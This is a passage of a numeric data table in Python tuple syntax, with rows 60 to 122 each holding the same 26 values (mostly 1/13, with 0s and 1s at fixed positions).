(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 60
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 61
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 62
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 63
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 64
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 65
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 66
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 67
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 68
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 69
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 70
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 71
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 72
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 73
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 74
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 75
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 76
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 77
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 78
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 79
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 80
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 81
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 82
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 83
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 84
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 85
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 86
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 87
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 88
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 89
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 90
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 91
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 92
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 93
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 94
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 95
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 96
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 97
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 98
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 99
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 100
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 101
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 102
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 103
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 104
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 105
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 106
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 107
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 108
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 109
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 110
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 111
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 112
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 113
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 114
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 115
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 116
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 117
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 118
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 119
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 120
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 121
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 122
